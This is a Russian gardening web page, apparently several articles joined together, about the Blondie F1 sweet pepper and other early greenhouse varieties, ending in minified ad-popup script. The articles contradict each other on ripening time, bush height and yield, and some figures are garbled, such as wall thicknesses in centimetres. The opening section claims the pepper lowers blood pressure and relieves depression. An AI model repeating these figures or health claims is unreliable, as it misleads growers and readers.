8 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика сорта перцев блонди

Характеристика сорта перцев Блонди F1

Перец Блонди категории F1 — гибрид сладкого перца, выпущенный в рамках одного из проектов крупнейшей швейцарской компании в сфере семеноводства — Syngenta AG.

Характеристика сорта перцев Блонди F1

Характеристика сорта

Селекционеры всего мира ищут способ повысить урожайность и товарные качества продукта. Лучшим выходом стало выращивание гибридов, созданных с помощью скрещивания двух оригинальных сортов. Одним из результатов такого скрещивания является перец сорта Блонди F1.

Согласно описанию, гибрид отличается следующими характеристиками:

  • раннеспелость плода (стадии спелости гибрид достигает спустя 60 дней после высадки рассады);
  • обладание рядом лечебных свойств (перец способен разжижать кровь и понижать давление, его рекомендуют употреблять больным сахарным диабетом, анемией и различными сердечно-сосудистыми заболеваниями; он способен снимать депрессию, усиливает иммунитет к вирусным болезням, содержит больше необходимого людям витамина С, чем лимон);
  • легкость в адаптации к любым условиям (имеет повышенную стойкость к холодным температурам, продолжает спокойно развиваться при повышенной жаре, транспортабельный, что делает его выгодным для оптовых закупок в супермаркеты);
  • высокая урожайность: один куст дает до 18 кг перцев;
  • индетерминантность;

Описание куста

Перец Блонди относится к среднерослым растениям, достигает до 60 см в высоту. Он обладает полураскидистой формой куста, имеет короткие междоузлия, сильную облиственнность.

Описание плода

Плод перца Блонди:

  • имеет кубовидную форму и 4 семенные камеры;
  • обладает крупной массой, около 200 г; средний размер — 10,5 х 10 см;
  • в спелом виде имеет цвет слоновой кости, лимонный или оранжевый;
  • имеет толстые стенки, гладкую кожицу;

Данный гибрид предназначен для выращивания как на открытом грунте, так и в различных видах теплиц, однако предпочтение следует отдать отапливаемым помещениям с качественным освещением и аэрацией.

Преимущество данного сорта — легкая адаптированность к любым природным и погодным условиям: переносимость заморозков и засухи.

В отличие от детерминантных сортов и гибридов, развитие которых останавливается по достижении определенной точки, индетерминантные культуры нуждаются в пасынковании и прищипывании.

Выращивая гибрид Блонди F1, необходимо помнить о следующих, наиболее важных пунктах:

  • Чтобы растение не загнивало и не поражалось заболеваниями, нужно регулярно проветривать помещение теплицы.
  • Если в теплице не будет достаточно освещения, цветы Блонди опадут, что грозит потерей урожая.
  • Чтобы контролировать его развитие и рост, необходимо прищипывать и пасынковать куст.

Болезни

Заболевание способно погубить весь урожай

Как и многие другие гибриды сладкого перца, Блонди F1 обладает хорошим иммунитетом к ряду заболеваний:

  • картофельному вирусу PVY;
  • вирусу табачной мозаики;
  • черной бактериальной пятнистости сладкого перца;
  • вирусу огуречной мозаики.

Не стоит забывать, что, помимо вышеуказанных заболеваний, к которым у Блонди F1 выработан иммунитет, существует ряд других, которые являются настоящей угрозой для всего урожая. Рассмотрим часть возможных заболеваний сладкого перца Блонди.

Ложная мучнистая роса

Одно из самых опасных грибковых заболеваний, распространенных во всех климатических зонах. Оно возникает из-за повышенной влажности и температуры, характеризуется многочисленными точками и желтыми пятнами на листьях, приводит к остановке процесса развития растения и плодов.

Профилактика и лечение ложной мучнистой росы:

  • необходимо придерживаться правил севооборота;
  • удаление больных растений;
  • обработка Купроксатом или Оксихомом на начальных стадиях развития болезни

Бактериальный рак

Бактериальный рак так же является очень опасным потенциальным заболеванием гибрида Блонди, потому что преимущественно поражает выращиваемые в теплицах перцы. Во время бактериального рака листья растения покрываются коркой в виде коричневых пятен. Лечению зараженное растение не подлежит. Для профилактики подходят следующие методы:

  • дезинфицировать теплицу бромистым метилом 2 раза в год;
  • соблюдать баланс температуры и влажности в помещении;
  • применять капельный полив.

Вредители

Помимо болезней, угрозой для растения являются вредители. Их существует огромное множество, и необходимо знать, как предотвратить их атаку и как бороться с ними, если атака произошла.

Проволочник

Он обитает в почве, питается корнями растения, из-за чего они останавливаются в развитии. Для борьбы с проволочником прибегают к следующим мерам:

  • уничтожение личинок во время перекапывания почвы;
  • установление приманочной травы для жуков и их уничтожение;
  • обработка корней перца пестицидами.

Колорадский жук

Колорадский жук питается любыми частями растения, и таким образом может уничтожить его полностью. Для борьбы с ним подходят следующие пестициды:

  • Командор для всего растения;
  • Актара для замачивания корней перца.

Ранние сорта перца для теплицы

Сладкий перец смело можно назвать одним из ярчайших представителей семейства пасленовых. Этот овощ входит в число лидеров по содержанию полезных веществ и витаминов. Исторической родиной сладкого перца являются южные широты. Там он замечательно растет и плодоносит независимо от сорта и ухода. Климат нашей страны может показаться этому неженке слишком суровым. Он может болеть и плохо плодоносить. Чтобы этого избежать в условиях нашего климата рекомендуется выращивать перец в теплице. Уже многие годы огородники предпочитают именно ранние сорта перца для теплицы.

Популярные ранние сорта для теплиц

Из года в год садоводы покупают семена разных сортовых перцев. Кто-то решается на эксперимент и берет новый для себя сорт. Кто-то, используя опыт прошлых лет, отдает предпочтение уже проверенным сортам. Но, независимо от причин покупки, есть сорта, которые постоянно пользуются популярностью у опытных садоводов и у новичков. Итак, рассмотрим подробнее самые популярные сорта перцев для теплицы.

Абрикосовая фаворитка

Этот сорт по праву считается раннеспелым. Срок созревания его плодов не превысит 120 дней. Низкие кустики высотой всего 50 см смогут порадовать высоким урожаем.

Перцы по форме напоминают конус. Они не очень крупные и имеют блестящую и гладкую текстуру. Их средний вес составит около 120 грамм. До созревания они окрашены в бледный зеленый цвет. По мере созревания их цвет становится ярко-оранжевым. Стенки имеют толщину 5-7 мм.

Вкусовые характеристики Абрикосовой фаворитки просто отменные. Перцы отличаются своей сочностью. Они хороши не только свежими, но и отлично подойдут для заготовок. С квадратного метра тепличной земли можно будет собрать до 19 кг перцев.

Агаповский

Раннеспелый компактный сорт, созревание которого составит около 110 дней. Его аккуратные кустики имеют высоту до 80 см. Отличительной чертой является его урожайность. Перцы достаточно крупные, весом порядка 120 грамм. Они слегка ребристые и гладкие на вид, имеют призмовидную форму. По мере созревания плоды постепенно окрашиваются с темного зеленого цвета до насыщенного красного. Стенки плода в толщину 5 см.

Вирус табачной мозаики не страшен для этого растения . Но многие садоводы отмечают уязвимость к вершинной гнили. Урожай доходит до 13 кг перцев с квадратного метра.

Винни-Пух

Этот сорт радует не только своим названием, но и ранним созреванием, которое наступает через 100 дней. Кустики этого перца невысокие, а боковые ветки, плотно прижатые к стеблю, делают его еще и компактным. Размер взрослого куста в высоту не превысит 30 см. Перцы конической формы имеют гладкую поверхность и краснеют по мере созревания. Вес плода равняется 60 граммам, а стенка имеет толщину около 6 см.

Перцы Винни-Пух обладают отменным вкусом. У них сочная сладкая мякоть. Эти перцы хорошо подходят для зимних заготовок. Растение имеет иммунитет к вертициллезу. Также ему не страшна тля. Квадратный метр принесет урожай до 5 кг урожая.

Ласточка

Этот ранний сорт, созревающий не позднее 130 дней от появления всходов. Растение с высотой до 65 см имеет овальные конусовидные плоды весом до 100 грамм. Поверхность у плода гладкая. Окрас плодов меняется по мере созревания с салатового цвета до красного. Стенка плода имеет толщину 7 мм.

Ласточка имеет иммунитет к вертициллезу. Она пригодна для консервирования. Кроме того, перцы имеют долгий срок хранения и не боятся транспортировок.

Раннеспелый сорт с невысокими компактными кустами. Средняя высота куста составит 60 см. Конусовидные перцы Ярика начинают созревать на 90 день и по мере увеличения зрелости желтеют. Средний вес плода составит 90 грамм.

Ярик имеет вкусную, сочную и ароматную мякоть. Растения устойчивы к табачной мозаике. Высокая урожайность позволяет собрать до 12 кг плодов с квадратного метра.

Популярные гибридные сорта для теплиц

Гибридные сорта появились благодаря скрещиванию двух обычных сортов. На принадлежность сорта к гибридному указывает обозначение «F1» на упаковке с семенами. Гибриды существенно отличаются от обычных перцев. Они более урожайные, у них лучший внешний вид и вкусовые характеристики. Кроме того, гибриды имеют больший размер плодов и более компактные кусты. Но у таких хороших характеристик есть своя цена – они требуют более качественного ухода.

Атлант F1

Это, пожалуй, самый популярный тепличный гибридный сорт. Учитывая, что его созревание требует около 120 дней, его можно отнести к раннеспелым гибридам. Этот гибрид отличается своей урожайностью – до 20 кг/м2.

За счет того, что высота взрослого растения не превысит 80 см, его можно выращивать и в невысоких пленочных теплицах. Перец Атлант F1 имеет удлиненную форму в виде конуса с глянцевым блеском. Средний вес плода – 190 грамм. В зрелом виде он имеет ярко-красную окраску. Стенки толщиной порядка 4-5 мм.

Этот перец имеет отменный вкус, он сочный и ароматный. Его можно использовать для закрутки. Антант F1 устойчив ко многим заболеваниям и нетребователен в уходе.

Буратино F1

Этот раннеспелый гибрид способен порадовать урожаем уже через 90 дней. Этот сладкий перец имеет раскидистые кусты до 1 метра в высоту. Учитывая, что кусты полудетерминантные, им нужна опора или подвязка. Удлиненно-конусовидные плоды этого гибрида имеют интересную градиентную окраску от темного зеленого до красного цвета. Максимальная масса перца не превысит 120 грамм, толщина стенки – 5 мм.

Мякоть отличается хорошими вкусовыми качествами, она сочная и ароматная. Гибрид универсален в своем предназначении. Он может с равным успехом использоваться свежим, в домашней кулинарии и консервировании. Он долго не теряет свежесть и имеет иммунитет к табачной мозаике и вершинной гнили. При соблюдении норм ухода урожай составит до 10 кг с квадратного метра.

Звезда Востока шоколадная F1

Гибридный сорт раннего срока созревания плодов. Кусты растения мощные и ветвистые, их высота не превысит 70 см. Примерно через 100 дней со дня всходов его крупные, похожие на цилиндр, плоды начинают созревать. Масса плода колеблется в пределах от 260 до 350 грамм, а стенки имеют толщину 10 мм. Этот гибрид выделяется на фоне других за счет необычного темно-коричневого окраса плодов.

Гибрид хорош на вкус, он имеет сладкую и сочную мякоть. Поражает его устойчивость к болезням и отличные сроки хранения. Кроме того, урожай составит до 10 кг с квадратного метра.

Латино F1

Этот сорт является ранним гибридом и начинает созревать через 100 дней. Его высокие кусты имеют компактные размеры. Созревшие перцы имеют ярко-красный окрас, вес в 200 грамм и толщину стенки 10 мм.

Плоды обладают прекрасными вкусовыми характеристиками, они нежные и сочные. Урожайность квадратного метра впечатляет – можно собрать до 14 кг.

Негоциант F1

Раннеспелый гибридный сорт для тепличных условий. От всходов до начала созревания пройдет около 100 дней. Это растение трудно отнести к компактным. Помимо того, что на них много листьев, они могут вырастать до 1 метра в высоту. Чтобы растение не сломалось под своим весом, его следует подвязать. Плоды этого гибридного сорта имеют форму конуса-призмы и вес до 200 грамм. В фазе созревания они окрашиваются в красный цвет с зелеными включениями.

Перцы имеют ароматную, сладкую и сочную мякоть. За счет этого, они идеально подходят не только для употребления свежими, но и для закруток. Гибрид отличается хорошей устойчивостью к табачной мозаике и вертициллезу. Урожайность составит до 8 кг/м2.

Ультраранние сорта и гибриды для теплиц

Каждый огородник мечтает поскорее увидеть результат своих усилий – свой урожай. Учитывая условия нашего климата получить быстрый урожай крайне затруднительно. И тут на помощь приходит селекция. Сейчас можно выбрать много как обычных сортов, так и гибридных, которые способны вызревать в ультракороткие сроки. При этом плоды такой селекции не теряют, а только приумножают свои полезные свойства и устойчивость к заболеваниям.

Белладонна F1

Ультраскороспелый гибридный сорт с компактными кустами до 80 см. Средний срок созревания перцев составит 90 дней. Бледно-зеленые плоды этого гибрида желтеют по мере созревания до светло-желтого цвета. Форма у плодов кубовидная с гладкой и глянцевой кожицей. Их масса не превысит 160 см, а толщина стенки будет равна 5-7 мм.

Для Белладонны F1 не страшна табачная мозаика. Урожайность с квадратного метра будет в пределах от 10 до 15 кг.

Блонди F1

Этот гибридный сорт можно считать рекордсменом по скорости созревания. После мартовской посадки кусты этого гибрида начинают плодоносить в июне. Нежно-желтые плоды весят в среднем до 150 грамм.

Блонди является очень урожайным растением, устойчивым к болезням и обладающим высоким качеством плодов.

Здоровье

Этот сорт сладкого перца вызревает одним из первых. Причем, даже нехватка света в теплице не способна повлиять на его урожай. Растение отличается своей высотой – порядка 150 см. Не пройдет и 90 дней, как можно будет собирать с его раскидистых кустов небольшие плоды. Средняя масса перца составит около 40 грамм, но на одном кусте их будет порядка 45 штук. Этот сорт не зря называется Здоровье. Его красные плоды просто кладезь полезных веществ. Они имеют сочную мякоть и тонкую кожицу. Кроме употребления свежих плодов, их можно с успехом консервировать.

Здоровье устойчив к вершинной гнили. Он обладает высокой урожайностью и позволяет собрать урожай до 5 кг с квадратного метра.

Кардинал F1

Это ультраранний гибридный сорт для выращивания в теплице, который отличается своей высотой – до 1 метра. Поэтому для полноценного его развития теплица должна иметь высоту не меньше 1,5 метра. Срок созревания перцев составит около 90 дней. Окраска плодов удивляет: с бледно-зеленого цвета она меняется на темно-фиолетовый. Перцы вырастают крупными, с массой до 280 грамм. Толщина стенки составляет 8 мм.

Кардинал F1 обладает иммунитетом к табачной мозаике. Квадратный метр принесет урожай около 15 кг.

Тритон

Кроме того, что это ультраранний сорт, он еще лучше многих других приспособлен к высадке в наших широтах. При посеве в марте сбор первого урожая начинается не позднее июня. Куст Тритона сильно ветвится и достаточно высокий – до 50 см. Созревшие перцы имеют яркую красную окраску и по форме напоминают веретено. Масса плода не превысит 120 грамм.

Отличительной особенностью является высокое качество его плодов. Он подойдет и для кулинарии, и для консервирования. Помимо этого, он имеет иммунитет ко многим заболеваниям и хорошо хранится. Урожай, собранный с квадратного метра, может доходить до 10 кг.

Все перечисленные сорта перцев обладают хорошей урожайностью и не являются привередливыми в уходе. Но все же, для получения обильного урожая надо соблюдать простые требования агротехники. При посадке следует придерживаться рекомендованных производителем семян сроков и условий высадки. Кроме того, перцы очень хорошо отзываются на регулярный уход, включающий в себя:

Более подробно об этом расскажет видео:

Высокоурожайный гибрид от швейцарских аграриев — перец Блонди F1: описание и характеристика сорта

Перец Блонди F1 — перспективный гибрид, полученный в Швейцарии (компания Сингента). Относится к высокопродуктивным и скороспелым видам. Выведен путем скрещивания двух урожайных крупноплодных оригиналов.

Описание и характеристика сорта

Перец Блонди F1 принадлежит линейке ранних гибридов. Плодоношение начинается в полную силу через 95–100 суток после прорастания сеянцев. Перец представлен кустами 70–80 см с разветвленными, умеренно раскидистыми побегами. Облиственность выражена хорошо. Междоузлия отличаются короткими размерами.

  • средняя масса — 250–300 г;
  • длина — 12–15 см;
  • форма — напоминает куб;
  • диаметр — 10–12 см;
  • окраска — в полной зрелости ярко-желтая;
  • кожица — глянцевая, желтая, с солнечным блеском;
  • толщина стенки — 7–8 мм;
  • семенных камер — 3–4.

Гибрид достаточно пластичен и приспособлен к климату разных зон. Активно возделывается от юга до севера (Сибирь, Алтай). Не боится опасных бактериальных патогенов. Редко поражается гнилями и грибками.

Преимущества и недостатки

  • возможность выращивания в теплицах и в открытых грядах;
  • презентабельный вид и товарность 94 %;
  • вкусовые свойства;
  • транспортабельность и сохранность до 5–6 недель (в условиях прохладных помещений и холодильников);
  • универсальное применение в кулинарии;
  • стойкость к распространенным инфекциям пасленовых;
  • хорошая всхожесть и заготовка семян дома;
  • стрессоустойчивость;
  • переносимость внезапных похолоданий.

Минусы:

  • светолюбивость;
  • не любит загущенности.

Урожайность

Перец Блонди F1 стабильно плодоносит даже в неблагоприятные сезоны. Урожай с 1 кв. м — 6,5–8,2 кг.

Посадка

Для рассады подготавливают плодородную легкую почвосмесь, используют магазинный субстрат (для перцев или томатов). При самостоятельной заготовке в равных долях смешивают дерн с компостом и торфом, добавляют песок и фосфорно-калийное удобрение (30 г на 1 ведро).

Семена перед посадкой замачивают в стимуляторе (Эпин, Агат), затем укладывают на 2–3 суток во влажную ткань. Сеют на 1–2 см вглубь лунки. Емкости (горшочки, контейнеры) сверху прикрывают пленкой. Температуру нельзя опускать ниже 24–25 градусов.

Выращивание и уход

  • систематическое увлажнение — 1–2 раза в неделю;
  • подвязывание и формировка (ведение в 2 ствола);
  • прополка и мульчирование;
  • внесение удобрений 2 раза в месяц (при созревании важны фосфорно-калийные смеси).

Болезни

Гибрид стойко сопротивляется инфекциям пасленовых: ВТМ, ВОМ, черная пятнистость, картофельный вирус. Избежать инфекций поможет соблюдение правил ухода.

Ложная мучнистая роса вызывается грибковым патогеном при условиях повышенной влажности и температуры. Характерные симптомы: бело-желтые очаги на листьях, прекращение роста и завязывания перцев. Растения орошают Оксихомом или Купроксатом, удаляют пораженные кусты с участка.

Бактериальный рак чаще поражает тепличные перцы. Проявляется наличием коричневатых пятен на вегетативной части. Лечение не проводится: зараженные растения выдергивают и сжигают. Профилактика сводится к стабилизации температурного режима в теплице, настраиванию капельной системы, помывки бромистым метилом в начале и конце сезона.

Вредители

Перец Блонди F1 в открытых грядах — лакомый кусочек для насекомых-вредителей.

Проволочник сильно повреждает кусты, подгрызает корни растений. Способы борьбы:

  • глубокая вспашка для уничтожения личинок;
  • проливание корней инсектицидными средствами;
  • установка приманок для жуков.

Колорадский жук наносит значительный урон перцам. Эффективные препараты для обработки:

Слизни быстро съедают листья и побеги, выявляются при осмотре. От потери вегетативной массы растения быстро погибают. Справиться со слизняками можно при помощи народных средств: горчица, жгучий перец, кофе, известь, табачный порошок. При массивном поражении применяют Грозу, Антислизень, Улицид, Актофит.

Блонди — сорт растения Перец сладкий

Характеристики сорта:

Свойства сорта Блонди:

Рекомендуемый регион на карте:

Информация о допуске Перец сладкий Блонди из Реестра Госсорткомиссии РФ

Заявка на допуск №36196 , зарегистрирована 2001-03-20 . Сорт Перец сладкий Блонди включен в реестр допущенных в 2003 году . Допущен к использованию в регионах: Центральный .

Оригинатором сорта Перец сладкий Блонди является:

  • SYNGENTA SEEDS B.V.
    (WESTEINDE 62, P.O. BOX 2, 1600 AA ENKHUIZEN THE NETHERLANDS)

Другие сорта растения Перец сладкий

Поиск сорта по названию
Подбор сорта
Вопрос экспертам портала

Если вы не нашли ответ на вопрос — не стесняйтесь, задайте вопрос эксперту.

Зарегистрируйтесь или Войдите, чтобы каждый раз не указывать Имя и Электронную почту

Спасибо за комментарий! Он будет опубликован после проверки модератором!

Комментариев еще нет, станьте первым!

Портал для тех, кто любит свою дачу

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Помогите нашему сайту развиваться!

Пожалуйста, прочитайте это обращение, оно не отнимет у вас много времени!

Нам так не хватает ваших комментариев и вопросов, чтобы понимать в каком направлении нам развиваться.

Не забудьте оставить комментарий, если вы нашли то что искали.
А если не нашли — задайте вопрос через форму «Спросить эксперта» в шапке сайта.
Мы ответим на этот вопрос, и другие посетители смогут найти ту информацию, которую не смогли найти вы.

С уважением,
команда портала Дача-Дача.ру

Ваш вопрос отправлен на модерацию.
Не переживайте, мы быстро проверяем вопросы и ответ на ваш вопрос будет оставлен в течение 1 дня.

Мы обратили внимание, что вы уже зарегистрированы на нашем сайте. Рекомендуем авторизоваться, чтобы просмотреть созданный вопрос. Если вы не помните пароль — можете восстановить его.

Вы не были зарегистрированы до сегодняшнего дня, поэтому мы зарегистрировали вас. Ваш пароль отправлен вам на указанный почтовый ящик.

Характеристика и описание сортов перца Виктория, Айвенго, Нежность, Блонди, Здоровье

Перец Виктория часто выбирают овощеводы для посадки на свои земельные участки. Сорт характеризуется ранними сроками созревания сочных и сладких плодов, имеются и другие положительные характеристики. Кроме этого вида, популярностью пользуются и другие сорта.

Рекордсмены по срокам созревания

Ранние сорта перца овощеводы могут выбрать для посадки в теплицу или на открытые участки земли. Характеристика и описание каждого выбранного вида поможет сделать правильный выбор.

Перец Здоровье не слишком компактное растение, в высоту тянется до 170 см. Плохо переносит холода, но способен развиваться даже при недостаточном освещении. По этим причинам лучше высаживать в защищенное место. Суперранние сроки созревания позволяют собрать многочисленный урожай уже на 90 сутки. Вытянутые плоды до 11 см весят 45 г.

Перец Блонди F1 начинает вступать в стадию зрелости уже спустя три месяца. Вес светло-желтых овощей кубовидной формы в среднем 150 г. Это урожайный гибрид, который редко подвергается инфекциям и прекрасно чувствует себя в холода.

Перец Бонета отличается дружной отдачей урожая спустя 88 дней, переносит засуху. Подходит для выращивания на открытых грядках. Кустик небольшой, компактный. Зрелые овощи красного цвета, направлены вверх, по форме напоминают призму, весят 150 г.

Перец Буратино зреть начинает через 90 дней. Раскидистый кустик с полудетерминантным типом роста в высоту достигает 80 см. Многочисленные крупные, удлиненные плоды весят от 70-110 г. Характеризуется средней устойчивостью к вершинной гнили и к вирусу табачной мозаики.

Перец Лотта дает возможность овощеводам собрать первый урожай уже спустя 2,5 месяца. Растение проявляет устойчивость к основным болезням, но требовательно к теплу, свету и влаге. Длина красных конусовидных плодов 12-14 см, масса 115 г.

Перец Ганнибал отличается короткими сроками образования спелых плодов (от всходов до созревания проходит в среднем 88 дней). Кустик небольшой, полураскидистый. Плоды призмовидной формы коричнево-фиолетового цвета, масса 100-140 г.

Ред Найт F1 характеризуется ранними сроками созревания, так как в стадию зрелости вступает уже на 65 сутки. Высокий кустик размещает многочисленные крупные плоды кубовидной формы. Овощ проявляет устойчивость ко многим болезням, быстро приспосабливается к различным условиям. Плохо переносит слабое освещение, начинает вытягиваться и сбрасывать завязи.

Ранний сорт Кузя относится к низкорослым растениям, высота кустика всего лишь 35 см. До момента созревания урожая ждать недолго, 90-95 дней. Призмовидные плоды весят чаще всего 80 г. Лучше всего выращивать в теплице или на подоконнике.

Урожай Дольче Итальяно садоводы начинают собирать уже спустя 90 дней. Растение высокое, образует немного боковых побегов, что облегчает уход за культурой. Крупные, удлиненные овощи (длина до 18 см) в виде конуса могут весить до 200 г.

У перца Факир также ранние сроки созревания (90 дней). Высота полураскидистого кустика около 65 см. Плоды в виде узкого конуса весят примерно 45 г. Растение редко подвергается болезням и порадует овощеводов высокой урожайностью.

Зрелый урожай перцев Раннее Чудо можно начать собирать уже спустя 93 дня. Кустик компактный с индетерминантным типом роста. В высоту стебель тянется до 120 см. Плоды в виде призмы длиной 15 см, их масса может достигать 250 г.

Разнообразие ранних овощей

Перец Лисичка порадует первым урожаем спустя 105 дней. Кустики компактные, занимают мало места, низкорослые. Небольшие плоды в стадии зрелости оранжевого цвета в виде конуса, весят примерно 40 г. Гибрид плохо переносит холода, поэтому рекомендовано выращивать в теплицах и парниках.

Перец Богдан относится к раннеспелым растениям. С момента появления всходов проходит примерно 100 дней. Высота кустика примерно 55 см. Желто-оранжевые овощи вытянутой формы (длина примерно 14 см) весят около 220 г. Редко болеет и хорошо переносит засуху.

Перец Аполлон является раннеспелым гибридом для открытого грунта и теплицы. В высоту вытягивается до 55 см. Урожайность высокая, на одном кустике формируется до 14 призмовидных плодов красно-оранжевого цвета, вес которых около 170 г.

Перец Нафаня вступает в стадию созревания уже на 95 сутки. Кустики компактные с полудетерминантным типом роста. Высота стебля составляет около 120 см. Ярко-бордовые овощи с тремя гранями могут весить 150 г. Сорт устойчив к различным неблагоприятным условиям и болезням, собранный урожай долго хранится.

Перец Викинг позволяет собрать урожай через 108 дней. Высота компактного кустика небольшая, на ветках может размещаться до 4 плодов призмообразной формы, массой примерно 200 г. Овощ устойчив к вирусам и бактериям, особенно к табачной мозаике. Растение неприхотливое, приспосабливается к любым условиям, поэтому сорт удобен для открытого грунта.

Перец Агаповский относится к среднеранним овощам (проходит 100 дней с момента появления всходов). Компактные кусты имеют много листвы. Сорт Агаповский отличается высокой урожайностью, редко болеет и подвергается нападению вредителей. Недостатком сорта Агаповский является плохая переносимость тени, в этом случае кустики быстро вянут. Обязательно нужно организовать правильный режим полива. Сорт Агаповский можно сажать как на защищенных, так и на открытых грядках. Овощ Агаповский формирует плоды в форме призмы длиной около 12 см массой 115 г.

Перец Кубышка является урожайным, раннеспелым видом. Куст раскидистый, в высоту может вытягиваться до 120 см. Цилиндрической формы овощи могут весить до 250 г.

Описание сорта перцев Любовь F1. Не требует особого ухода, быстро приспосабливается к различным неблагоприятным условиям. С момента появления всходов до начала созревания проходит всего лишь 85 дней. Куст, высотой до 65 см, компактный, мощный, слабораскидистый. Конической формы сладкие овощи в длину до 18 см весят 150 г.

Овощ сорта Ред Барон в стадию спелости вступает через 98 дней, проявляет устойчивость к вирусу табачной мозаики. Кустик имеет среднюю высоту, не очень раскидистый. Плоды в виде куба, массой около 200 г.

Перец Зорька можно собирать на 95 сутки. Растение низкорослое (45 см), слабоветвистое, неприхотливое, хорошо противостоит инфекциям, поэтому подходит для открытого грунта. Овощи крупные в форме призмы, красно-оранжевого цвета, весом около 110 г. Многочисленный урожай созревать начинает дружно.

Перец Ведрана относится к среднерослым, полураскидистым растениям. Плодоносить начинает спустя 95 дней. Плоды большие, кубовидные, красно-алого цвета, масса 190-230 г. Овощеводы отмечают, что гибрид редко болеет.

Среднеранние сроки

Сорта перца сладкого со среднеранними границами удастся попробовать всего лишь на пару дней позже.

Описание вида сладкого перца Виктория. Сладкий перец Виктория начинает зреть спустя 112 дней. Он хорошо переносит низкие температуры, противостоит многим распространенным инфекциям и порадует богатым урожаем. Цвет конусообразных плодов становится насыщенного красного цвета, их длина около 11 см, масса 60 г. Отзывы свидетельствуют о том, что данный вид овоща можно не боясь сажать не только в теплицу, но и на открытые участки.

Перец Нежность характеризуется среднеранними границами созревания плодов, проходит примерно 118 дней с момента появления первых всходов. Куст не слишком раскидистый, в высоту достигает около метра. Рекомендуется выращивать в защищенном грунте. Вес зрелых, красных овощей примерно 110 г, форма пирамидальная, длина 11 см. Растение противостоит многим болезням, включая табачную мозаику.

Перец Самандер отличается не только ранним созреванием плодов, но и высокой урожайностью. Кустик невысокий, компактный. Хорошо переносит плохие погодные условия, листья защищены толстой кожицей от солнечных ожогов. Темно-красные овощи имеют вытянутую форму с заостренным концом, весят 110 г.

Среднепоздний гибрид перцев Аристотель F1 хорошо переносит различные погодные условия. Высота мощного, облиственного куста приблизительно 70 см. Плоды в виде куба могут весить около 200 г. Гибрид имеет хороший иммунитет, поэтому редко болеет.

Перец Маркони отличается среднеранними сроками созревания урожая (проходит 110-115 дней). Сладкие плоды удлиненной формы (длина около 25 см), заостренные на конце, весят в среднем 170 г. Прекрасно чувствует себя на открытых грядках. Высота мощного стебля примерно 60 см.

К ранним видам относится перец Айвенго. Сочные, красные плоды, массой 110-150 г, начинают краснеть уже спустя 115 дней. Урожайность у данного сорта очень высокая. Перец Айвенго плохо переносит холода, почва должна быть всегда теплой. Поэтому лучше сажать в тепличное помещение.

Перец сорта Айвенго обладает большим списком положительных сторон. Даже плотная посадка саженцев не снизит высокую урожайность. В описании перца Айвенго стоит упомянуть о сочных и ароматных плодах, даже в полузрелом состоянии. Собранный урожай пригоден к длительному хранению и перевозке на дальние расстояния. Сорт Айвенго редко болеет и подвергается атаке вредителей.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
